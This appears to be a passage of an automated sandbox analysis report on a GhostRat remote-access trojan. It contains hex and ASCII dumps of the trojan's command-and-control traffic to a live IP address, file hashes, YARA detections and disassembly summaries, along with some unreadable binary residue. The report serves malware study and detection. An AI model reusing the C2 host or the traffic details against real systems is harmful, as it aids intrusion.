T;Uarai)gdIugg3u;SR<$gPhOiL$0gt$WD$_`eNa,8#,Dh.gt$'D$7`!za#,X DCP#,nllfL$TC tC(+nKgtC DCHh6^f^#,8NT<fku1t}d+\|feu{\|ckut}d\|fetqIoZgj'g81$x S\$8D$\|$g(P3,<#,\|(_XCgT$#D$b@Vx,S\$8D$\|$g$P3,<#,\|$HGD_XCgT$#D$H,d@ #,W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	45.201.245.153	80	5408	C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 18:31:36.209316969 CEST	6	OUT	Data Raw: 78 33 32 00 Data Ascii: x32
Sep 14, 2024 18:31:36.797843933 CEST	1236	IN	Data Raw: 0e b0 04 00 00 00 00 00 00 00 00 00 00 00 c2 b9 2f 2b 2b 7e a0 c7 a8 c7 33 78 7d a0 5a 17 7c a2 7e df a0 6f 25 53 ae eb 5f 46 a8 57 25 57 2b 5f 4d a0 77 23 33 a2 76 d3 ae f0 5f 70 a0 7f 23 37 a0 5f 23 0b 28 fa a0 6f 23 0f 28 da a2 7e c3 28 ea 18 Data Ascii: /++~3x}Z\|~o%S_FW%W+_Mw#3v_p#7_#(o#(~(^n_(V,_<B+++$(h(^vT^_:^iYtupvV#+^:n$/{~/(\|z~#~zN+++++s;+nnv~zzO+++x}\|k'{?j
Sep 14, 2024 18:31:36.797943115 CEST	1236	IN	Data Raw: 11 41 2f 43 2b 3b 2b 2b d4 5d 2e 28 ed 78 a2 6e d3 d4 7e cf a0 f3 ae f0 5e 2f 18 eb c0 74 d4 5d 2e 78 d4 5d 22 7c d4 7e d3 a8 ef 3b a8 d3 d4 5f 0b 10 6d 2e 5e 30 a0 d0 18 f0 68 ab 15 2b a6 6e d7 7b a0 fc a6 66 f7 a6 6d 3a 5e 38 41 2b 7b c0 3a 43 Data Ascii: A/C+;++].(xn~^/t].x]"\|~;_m.^0h+n{fm:^8A+{:C+k++].x~{A+'_'C+k++].\|~ntupv+++++++*+^+++GDJO++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Sep 14, 2024 18:31:36.797977924 CEST	1236	IN	Data Raw: 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 7e a0 c7 7d a0 da a0 6d 2f ec 2d 37 5f 2a 3b ae eb 5f 25 43 2b ab 2b 2b 41 2b 7b d4 3e e3 7b 2a 3b dd 6e 23 2a 5f 22 7d c3 c6 73 2b 2b Data Ascii: +++++++++++++++++++++++++++++++++++++~}m/-7_;_%C+++A+{>{;n#_"}s++/uv/+7_;b/_%C+++A+z>{;~}e/\|V'^/.m#(T+++n#e#\|{z*++'V;+_f#U`x}#n?:~#$/))++n#<(/
Sep 14, 2024 18:31:36.798015118 CEST	388	IN	Data Raw: fb 10 fa 56 7f 18 f9 a0 ed dc da a0 6c 2f a8 17 bb 2b a6 2f bb 5e 3a a0 66 23 41 2b 7a 7b d4 3e 4f 7b 2a 3b ae eb 5f 0b 7d 6d 7d 78 d4 3e 4f 7b 2a 3b a0 6e d7 6b a2 6e d7 10 2c 59 9d a0 6e d3 75 70 a0 ce 76 e9 2f 2b 7d 6d 7d 78 d4 3e 4f 7b 2a 3b Data Ascii: Vl/+/^:f#A+z{>O{;_}m}x>O{;nkn,Ynupv/+}m}x>O{;n+++upnv/+~zxv#P/+^"pv#++++}n#hon++++UO\|`//$]%\|A+{>O{;_~#}m}y>O{;n#`oTntupv#+~#}m
Sep 14, 2024 18:31:36.798049927 CEST	1236	IN	Data Raw: 2b 2b 5f 05 a0 7e 27 a6 66 3b 7a 79 a6 ae d7 d0 d4 d4 7b c3 38 70 2b 2b a0 a5 9b 2b 2b 2b a0 ad fb 2b 2b 2b 7a a6 be d7 d0 d4 d4 7d 79 d4 fb a8 ef 33 a0 66 d7 18 e6 c3 9d 79 2b 2b a0 ce 76 e8 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 ae a3 e3 2b 2b Data Ascii: ++_~'f;zy{8p++++++++z}y3fy++v+++_$++++_-+++~x6;}\|C+++_!6*;.s++/$+++n#f'-++++++U;U?U3U7UU_USm+++mmkUo+++Ucm/S.++m#K.+++
Sep 14, 2024 18:31:36.798088074 CEST	1236	IN	Data Raw: a6 a5 b7 2b 2b 2b 10 22 5f 49 a8 e4 d4 a0 2a a0 7b 37 10 7d 33 5e 7e a0 7d 4f 10 7d 17 58 66 a0 3b a0 73 2f a2 71 2f a0 7b 2f a0 33 a2 31 ec 2b 2b 2b 2b 2b ec 6b 2f 2b 2b 2b 2b a0 bd bb 2b 2b 2b 2a 55 77 a2 7b 2f a6 bd a7 2b 2b 2b a2 3b a0 bd bb Data Ascii: +++"_I{7}3^~}O}Xf;s/q/{/31+++++k/+++++++Uw{/+++;+++)++++++mOm3"^mOmX!V+_/ec)n'tupv~f''R,v++++x}$+++++++$++++++}l#$+++fW(nn&;o){_/.x
Sep 14, 2024 18:31:36.798139095 CEST	1236	IN	Data Raw: ec 2f 6b 10 ad 83 2b 2b 2b 59 f6 a0 26 bf 97 2a 3b a0 ad 8f 2b 2b 2b 7b ae e2 5f 2f d4 fa c0 2e c3 72 64 2b 2b a8 ef 2f a2 95 8f 2b 2b 2b 74 a2 b5 87 2b 2b 2b 70 a0 ad 83 2b 2b 2b a0 a5 8f 2b 2b 2b a0 7e 23 a6 2f ea a0 66 27 a2 3b a2 63 2f d4 ad Data Ascii: /k+++Y&;+++{_/.rd++/+++t+++p++++++~#/f';c/+++vj7}3\|U$+++$+++++++++x+++_7s7z7_T,k/^+++"j/323`/#}w0;z_/.e+++++/_q,c7e3^{e
Sep 14, 2024 18:31:36.798173904 CEST	1236	IN	Data Raw: e7 7e a0 c7 a8 c7 4b 7d a0 db a0 6d 67 18 f9 7c a0 95 9f 2b 2b 2b a2 6e db a2 56 d7 a2 7e c7 a2 7e f7 12 7d 5b 24 af 9a 2e 2b 2b a0 25 a0 6d 17 a2 66 83 a0 65 4f 10 e3 58 2c 00 ea a2 6e df c0 28 a2 7e df a0 6d 33 a2 6e eb a0 ad 83 2b 2b 2b 78 18 Data Ascii: ~K}mg\|+++nV~~}[$.++%mfeOX,n(~m3n+++x~~n$+++nc3ne/Ug+++_4+++_<yC_;A*n'_6+++f~{+++}zy;V+++/#k/nn,MnMl/y+Ml-nl#d'ff
Sep 14, 2024 18:31:36.798206091 CEST	1236	IN	Data Raw: 7c 23 a0 68 37 a2 6c 27 a0 78 0b a2 7c 3b a0 68 0f a2 6c 3f a0 68 0f a8 ec 33 ae eb 5f 3f 7b a6 60 13 7a 7c c3 cf b4 2b 2b a0 66 db a8 ef 27 28 50 0f a0 78 1f 10 7d 57 59 2c ec 6d 27 d4 d4 d4 d4 a0 30 a6 ad bf 2b 2b 2b 10 f3 24 ae 57 d5 d4 d4 00 Data Ascii: \|#h7l'x\|;hl?h3_?{`z\|++f'(Px}WY,m'0+++$WVpU+++_2++++_;\|C_;A>'+++f+++{}\|z;V+_m?m;m)X,m)+++m(n}#$mo+++V+_nm)X,m)+++e#+++mo+++.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	45.201.245.153	80	5408	C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 18:31:39.230499983 CEST	16	OUT	Data Raw: 10 00 00 00 04 b1 4e 00 00 00 00 00 ca 00 2b 2f Data Ascii: N+/
Sep 14, 2024 18:31:39.824506044 CEST	115	IN	Data Raw: 73 00 00 00 04 b1 4e 00 00 00 00 00 ca 00 2b 4d dc 1d 2b 4e 2b 18 2b c7 2b 4b dc 40 2b 4e 2b 48 2b c5 2b 1c dc 1d 2b 1e 2b 49 2b c2 2b 49 dc 1c 2b 4f 2b 4f 2b c6 2b 1f dc 4d 2b 49 2b 19 2b 93 2b 1c dc 48 2b 1c 2b 18 2b 97 2b 1f dc 1d 2b 2b 2b 2b Data Ascii: sN+M+N+++K@+N+H++++I++I+O+O++M+I+++H++++++++++/y++++++/y++++++/y++++++
Sep 14, 2024 18:31:39.824980974 CEST	2643	OUT	Data Raw: 53 0a 00 00 04 b1 4e 00 00 00 00 00 ca 00 2a 2f dc 79 2b 50 5d 7e 74 d4 41 78 8b 57 2b 4f 2b 47 2b 99 2b 70 dc 1b 2b 42 2b 45 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b Data Ascii: SN*/y+P]~tAxW+O+G++p+B+E++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y+++++
Sep 14, 2024 18:31:40.055646896 CEST	1236	IN	Data Raw: 12 4a 04 00 04 b1 4e 00 00 00 00 00 ca 00 2e 2f dc 79 2b 50 5d 7e 74 d4 41 78 8b 57 2b 4f 2b 47 2b 99 2b 70 dc 1b 2b 42 2b 45 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b Data Ascii: JN./y+P]~tAxW+O+G++p+B+E++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y+++++
Sep 14, 2024 18:31:40.055705070 CEST	1236	IN	Data Raw: dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 Data Ascii: y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y+
Sep 14, 2024 18:31:40.055738926 CEST	1236	IN	Data Raw: 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 Data Ascii: ++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++y~xyW\|~~o!_FWW/w#3p#7~_'zo#(
Sep 14, 2024 18:31:40.055789948 CEST	1236	IN	Data Raw: 7f 1b 0b 28 e5 7c 66 db df af a0 67 1b 0f 28 3b a2 7a 30 f0 66 db 12 77 1b e1 5d 62 57 81 a0 2f b1 d4 5e f9 28 e9 8c f2 6e d7 d4 7b 3b 70 eb 5b f8 f2 7e c7 68 10 77 c2 3f 5d 3f 92 07 a0 6e d7 43 f5 6b 2f dc 86 5c 7b 7d d4 7b f9 18 ef 83 27 70 a0 Data Ascii: (\|fg(;z0fw]bW/^(n{;p[~hw?]?nCk/\{}{'pv~nW4$/s~/W4;(o7~xyfN]a>+.Qm(5_}C+;++]*xn^/t\|x]"\|~_;_i0n{xfQ?:^8A+>yk++
Sep 14, 2024 18:31:40.055824041 CEST	1236	IN	Data Raw: 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f Data Ascii: +/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y~}i-y(;p[+++A{Y(;n[/H+v+W
Sep 14, 2024 18:31:40.055857897 CEST	1236	IN	Data Raw: e9 61 08 24 28 f9 55 29 3f 18 f9 ae e2 fa b4 ed 96 5a e1 28 da a2 5b ed 75 a4 39 24 e8 e7 78 18 f0 cc 35 59 f6 2e a0 6d 2f a6 17 6d a0 28 5f 81 24 5d 3f a0 23 7e 3a 7f b6 79 79 d4 3e 73 09 f6 3b e8 db 79 2b 2b 2b 68 10 eb 59 f5 ef a2 74 a0 6d 2f Data Ascii: a$(U)?Z([u9$x5Y.m/m(_$]?#~:yy>s;y+++hYtm/6_8*+/uo/\|y+p99h-v+n,F\|Q&o}r/y$%-h+/e^>W4#A+z{>{z;_my>(;~nn,YCj$'pv
Sep 14, 2024 18:31:40.055891991 CEST	1236	IN	Data Raw: d8 f0 7a 2f a0 63 2f 7e 3b a6 cd f0 33 a2 73 2f 7b ce d8 5b d6 86 fd a0 1e 9f 1e f1 3b c4 d9 91 d1 ba 2a 2b a8 31 2f 14 e3 0c e4 a0 66 23 a6 4c a7 2f dc 79 10 14 5f 1d a0 0a a0 28 57 71 a0 7b 2f a2 7a f1 a0 67 d8 f2 3b a2 3a a2 33 7c 73 2b 8c 42 Data Ascii: z/c/~;3s/{[;+1/f#L/y_(Wq{/zg;:3\|s+B_!~};.d/_/^~f'W+++6_5B_!~};.d/W4#/t/y_1{[;E+#}rwrvrC+/U+++l/yz_!}tupvy/tuv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	45.201.245.153	80	5408	C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 18:31:47.337352991 CEST	4702	OUT	Data Raw: 5e 12 00 00 f7 ba 4e 00 00 00 00 00 ca 00 24 22 d4 79 12 2b 19 2b 05 f5 1a 22 d3 79 13 2b 05 2b 19 f5 05 22 d1 79 0b 2b 2b 2b 2b f5 2b 22 e5 79 2b 2b 2b 2b 2b f5 2b 22 e5 79 2b 2b 2b 2b 2b f5 2b 22 e5 79 2b 2b 2b 2b 2b f5 2b 22 e5 79 2b 2b 2b 2b Data Ascii: ^N$"y++"y++"y+++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y+++++
Sep 14, 2024 18:31:47.581410885 CEST	15	IN	Data Raw: 0f 00 00 00 f7 ba 4e 00 00 00 00 00 ca 00 e8 Data Ascii: N
Sep 14, 2024 18:31:47.582704067 CEST	15	OUT	Data Raw: 0f 00 00 00 f7 ba 4e 00 00 00 00 00 ca 00 e9 Data Ascii: N
Sep 14, 2024 18:31:59.298732042 CEST	15	OUT	Data Raw: 0f 00 00 00 f7 ba 4e 00 00 00 00 00 ca 00 eb Data Ascii: N
Sep 14, 2024 18:31:59.463129997 CEST	16	IN	Data Raw: 10 00 00 00 f7 ba 4e 00 00 00 00 00 ca 00 eb 22 Data Ascii: N"
Sep 14, 2024 18:31:59.543032885 CEST	574	OUT	Data Raw: 3e 02 00 00 f7 ba 4e 00 00 00 00 00 ca 00 22 22 d5 79 0b 2b 46 2b 42 f5 45 22 e5 79 2b 2b 2b 2b 2b f5 2b 22 e5 79 2b 2b 2b 2b 2b f5 2b 22 b5 79 59 2b 44 2b 4c f5 59 22 84 79 46 2b 0b 2b 66 f5 4a 22 8b 79 4a 2b 4c 2b 4e f5 59 22 e5 79 2b 2b 2b 2b Data Ascii: >N""y+F+BE"y++++++"y++++++"yY+D+LY"yF++fJ"yJ+L+NY"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y+++++
Sep 14, 2024 18:32:15.250242949 CEST	15	OUT	Data Raw: 0f 00 00 00 f7 ba 4e 00 00 00 00 00 ca 00 eb Data Ascii: N
Sep 14, 2024 18:32:15.413552999 CEST	16	IN	Data Raw: 10 00 00 00 f7 ba 4e 00 00 00 00 00 ca 00 eb 22 Data Ascii: N"
Sep 14, 2024 18:32:15.515043020 CEST	574	OUT	Data Raw: 3e 02 00 00 f7 ba 4e 00 00 00 00 00 ca 00 22 22 d5 79 0b 2b 46 2b 42 f5 45 22 e5 79 2b 2b 2b 2b 2b f5 2b 22 e5 79 2b 2b 2b 2b 2b f5 2b 22 b5 79 59 2b 44 2b 4c f5 59 22 84 79 46 2b 0b 2b 66 f5 4a 22 8b 79 4a 2b 4c 2b 4e f5 59 22 e5 79 2b 2b 2b 2b Data Ascii: >N""y+F+BE"y++++++"y++++++"yY+D+LY"yF++fJ"yJ+L+NY"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y+++++
Sep 14, 2024 18:32:33.250274897 CEST	15	OUT	Data Raw: 0f 00 00 00 f7 ba 4e 00 00 00 00 00 ca 00 eb Data Ascii: N

Target ID:	0
Start time:	12:29:31
Start date:	14/09/2024
Path:	C:\Users\user\Desktop\N6xnw0iEGs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\N6xnw0iEGs.exe"
Imagebase:	0x400000
File size:	31'561'216 bytes
MD5 hash:	8F6F306BA501A7E435DB720BB97CB1E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:31:34
Start date:	14/09/2024
Path:	C:\Program Files (x86)\IemFNe\Fj0RhXL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\IemFNe\Fj0RhXL.exe"
Imagebase:	0x400000
File size:	6'453'568 bytes
MD5 hash:	C8E8EEAF5464AF1A188B3DC12C890813
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3557268129.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3622789502.0000000003BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3557221510.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3377534559.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3095889918.0000000004F91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3217861470.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3095889918.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3217903493.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3623492196.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3040097047.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3622694265.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3058368131.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3377599757.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 3%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	12:31:43
Start date:	14/09/2024
Path:	C:\Program Files (x86)\IemFNe\Fj0RhXL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\IemFNe\Fj0RhXL.exe"
Imagebase:	0x400000
File size:	6'453'568 bytes
MD5 hash:	C8E8EEAF5464AF1A188B3DC12C890813
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:31:51
Start date:	14/09/2024
Path:	C:\Program Files (x86)\IemFNe\Fj0RhXL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\IemFNe\Fj0RhXL.exe"
Imagebase:	0x400000
File size:	6'453'568 bytes
MD5 hash:	C8E8EEAF5464AF1A188B3DC12C890813
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	12%
Total number of Nodes:	1789
Total number of Limit Nodes:	16

Executed Functions

Function 04290031 Relevance: 70.8, APIs: 2, Strings: 38, Instructions: 811memoryCOMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 042904A2
VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 042904D2

Strings

F, xrefs: 0429018B
t, xrefs: 04290186
p, xrefs: 042900F6
Lo, xrefs: 042900FB
b, xrefs: 04290112
Syst, xrefs: 04290218
G, xrefs: 04290204
tu, xrefs: 04290136
ushI, xrefs: 0429019A
Ta, xrefs: 0429027C
Fu, xrefs: 04290259
Cach, xrefs: 042901F9
Vi, xrefs: 0429012B
b, xrefs: 04290286
Via, xrefs: 04290311
otec, xrefs: 0429017E
ee, xrefs: 042900EF
oc, xrefs: 04290153
mI, xrefs: 04290220
P, xrefs: 04290175
Li, xrefs: 0429010B
a, xrefs: 0429016C
iv, xrefs: 04290211
A, xrefs: 04290146
o, xrefs: 042901C8
ctio, xrefs: 0429026A
tNat, xrefs: 04290209
A, xrefs: 04290243
a, xrefs: 0429011B
Rt, xrefs: 04290232
S, xrefs: 042900E6
fo, xrefs: 0429022B
yA, xrefs: 04290124
ucti, xrefs: 042901BD
a, xrefs: 04290102
st, xrefs: 042901AC
tu, xrefs: 04290165
a, xrefs: 0429013D

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
API String ID: 2032221330-2899676511
Opcode ID: 15b3c3a1d8b5dafea4a93bb4805a509b4eeb6b1eaca912e0ae13e9403863b76d
Instruction ID: 556affab8c574445bc3d2e8dacbf3a5c73ccda58463f3fb081316a2fdde6e388
Opcode Fuzzy Hash: 15b3c3a1d8b5dafea4a93bb4805a509b4eeb6b1eaca912e0ae13e9403863b76d
Instruction Fuzzy Hash: D1627D7161938A8FEB34CF24C880BABB7E5BF84704F04492DE9D98B251E770E945CB56

Function 1000839B Relevance: 4.9, APIs: 3, Instructions: 395
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 100075D8: SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000002,1000778E,?,00000000,?,?,?,100078E5,?,00000140,00000000,00000000), ref: 10007604

__fassign.LIBCMT ref: 100085CA
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 1000872F
LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 1000875B

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: FileTime$LocalPointerSystem__fassign
String ID:
API String ID: 3768451866-0
Opcode ID: a0e44370e820a411ac3c4e0395b38255e828509c73a91178447ff1e363976091
Instruction ID: 7caf3288ed05fb6a441e9699661c42ec8f0179eb69e3d41cd2bddb86a4807b91
Opcode Fuzzy Hash: a0e44370e820a411ac3c4e0395b38255e828509c73a91178447ff1e363976091
Instruction Fuzzy Hash: 85F1BF709046659BEB64CB28C8887D9BBF0FF09390F1445E9E899DB286D735AB81CF50

Function 10005CA2 Relevance: .7, Instructions: 662COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f67011e4635fa95f2e3239d786ef2b4d711adfe7c7f6f2761a5dd8ab5be8fb57
Instruction ID: 82261dd005aa2ff95a724a3fc746c58a7ee0d63950bd4ce8a00652ab59f08db2
Opcode Fuzzy Hash: f67011e4635fa95f2e3239d786ef2b4d711adfe7c7f6f2761a5dd8ab5be8fb57
Instruction Fuzzy Hash: E5522A71D0061ADFDF14CF98C9846AEBBF1FF08351F2481AAE855AB649D735AA50CF80

Function 1000324B Relevance: 206.1, APIs: 71, Strings: 46, Instructions: 1341
sleepregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 100033B1
Sleep.KERNEL32(00000001), ref: 100033D8
_memset.LIBCMT ref: 100034D7
Sleep.KERNEL32(00000001), ref: 100034F8
_memset.LIBCMT ref: 100035FE
__time64.LIBCMT ref: 1000361E
_memset.LIBCMT ref: 10003641
_rand.LIBCMT ref: 10003649
_rand.LIBCMT ref: 10003663
_memset.LIBCMT ref: 100036E1
wsprintfA.USER32 ref: 10003706
_memset.LIBCMT ref: 1000371D
Sleep.KERNEL32(00000001), ref: 1000374E
_memset.LIBCMT ref: 10003761
wsprintfA.USER32 ref: 1000377E
_memset.LIBCMT ref: 100037CD
wsprintfA.USER32 ref: 100037F3
_memset.LIBCMT ref: 1000380E
Sleep.KERNEL32(00000001), ref: 1000382D
_memset.LIBCMT ref: 1000385F
wsprintfA.USER32 ref: 10003880
_memset.LIBCMT ref: 10003897
Sleep.KERNEL32(00000001), ref: 100038B6
_memset.LIBCMT ref: 100038E3
wsprintfA.USER32 ref: 10003904
_memset.LIBCMT ref: 1000391B

Part of subcall function 100028B9: _memset.LIBCMT ref: 100028FF
Part of subcall function 100028B9: _memset.LIBCMT ref: 10002911
Part of subcall function 100028B9: _memset.LIBCMT ref: 10002920

Sleep.KERNEL32(000003F2), ref: 10003967
Sleep.KERNEL32(000003F2), ref: 1000399A
Sleep.KERNEL32(000003F2), ref: 100039CD
__time64.LIBCMT ref: 100039DB
_memset.LIBCMT ref: 100039F9
_rand.LIBCMT ref: 10003A03
_memset.LIBCMT ref: 10003A32
_memset.LIBCMT ref: 10003A90

Part of subcall function 10009824: __EH_prolog3_GS.LIBCMT ref: 1000982E
Part of subcall function 10009824: wsprintfA.USER32 ref: 100098BD
Part of subcall function 10009824: OutputDebugStringA.KERNEL32(?,?,?,?,?,?,10016B40,000000FF), ref: 10009BF6

Part of subcall function 10002D6B: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10002D87
Part of subcall function 10002D6B: GetFileSize.KERNEL32(00000000,00000000), ref: 10002D92
Part of subcall function 10002D6B: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 10002DAD
Part of subcall function 10002D6B: CloseHandle.KERNEL32(?), ref: 10002DCC

Sleep.KERNEL32(00000001), ref: 10003BB0
Sleep.KERNEL32(00000320), ref: 10003BB7
_memset.LIBCMT ref: 10003BD1
_mbstowcs.LIBCMT ref: 10003BEE

Part of subcall function 1000A77D: __mbstowcs_l_helper.LIBCMT ref: 1000A79D

_memset.LIBCMT ref: 10003C0F
_memset.LIBCMT ref: 10003C36
_strcat_s.LIBCMT ref: 10003C53
FindWindowExA.USER32(00000000,00000000,?,00000000), ref: 10003C66
